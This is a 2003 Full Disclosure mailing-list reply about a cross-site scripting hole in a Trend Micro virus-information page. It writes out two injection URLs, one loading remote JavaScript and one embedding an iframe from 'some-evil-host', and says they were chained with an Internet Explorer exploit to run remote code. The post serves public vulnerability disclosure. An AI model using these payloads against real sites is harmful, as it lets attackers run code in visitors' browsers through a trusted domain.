Full Disclosure mailing list archives
Re: Selfmade worms in the wild ;)
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 30 Aug 2003 03:14:03 -0700
well... lets see, we could make it an untrusted link by " http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756& VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista .com/backend/news.js"%20type="text/javascript"></script> " and include some remote javascript of our choice, or the latest IE ADODB explot. the obvious choice for that would be the classic.. http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756& VName=WORM_MSBLAST.<iframe src="http://some-evil-host/script/orhtml/etc/bla/"></iframe> for everones info, the above was tested with the ADODB exploit to execute remote code... sucessfully i might add. ( unpatched IE ) this goes to show that XSS is still very much a security concern, especially coupled together with the lastest browser exploit to become a very dangerous vector of attack, especially by way of a previously "trusted" URL. this is not looking real good for trend. good job Mo 8-) morning_wood http://exploitlabs.com http://e2-labs.com ----- Original Message ----- From: "Redaktion-Kryptocrew" <momolly () kryptocrew de> To: <full-disclosure () lists netsys com> Sent: Friday, August 29, 2003 12:02 AM Subject: [Full-disclosure] Selfmade worms in the wild ;)
You can change id's and names... -mo- Kryptocrew .: your security advisor team :. mailto:momolly () kryptocrew de
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Selfmade worms in the wild ;) Redaktion-Kryptocrew (Aug 29)
- Re: Selfmade worms in the wild ;) knitti (Aug 29)
- Re: Selfmade worms in the wild ;) morning_wood (Aug 30)
- Re[2]: Selfmade worms in the wild ;) Redaktion-Kryptocrew (Aug 30)
- <Possible follow-ups>
- Re: Selfmade worms in the wild ;) knitti (Aug 29)